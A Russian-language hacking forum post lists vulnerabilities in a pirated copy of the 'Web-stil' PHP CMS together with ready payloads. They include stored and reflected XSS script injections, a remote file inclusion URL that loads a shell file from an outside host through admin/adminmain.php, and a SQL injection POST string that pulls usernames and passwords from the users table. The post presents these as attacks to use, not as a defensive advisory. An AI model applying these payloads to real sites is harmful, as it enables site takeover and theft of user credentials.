![]() |
Web-stil ("пиратская" копия)
Web-stil ("пиратская копия")
Version: 1.0 (нет данных) Active XSS Vuln file: chat.php(messlist.php) Файл chat.php через <iframe> загружает результат messlist.php, а messlist.php в свое время берет сообщения из БД (в БД сообщение добавляется без фильтрации): PHP код:
PHP код:
Код:
Просто через форму добавляем сообщения с содержанием "<script>alert('XsS')</script>" и имеем активку..[/COLOR] Passive XSS Vuln file: register.php PHP код:
Код:
http://[host]/[path]/register.php?r="><script>alert(111)</script> |
RFI or LFI
Need: allow_url_include = on admin account admin/adminmain.php PHP код:
Код:
http://localhost/web-stil/admin/adminmain.php?p=http://pentagon.xek/myshell_at_pentagon.txt? p.s. указывайте ссылки на скачивание,приходится гуглеть. |
SQL inj
if mq = off Vuln file: inbox.php PHP код:
Код:
Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+" |
Часовой пояс GMT +3, время: 06:31. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot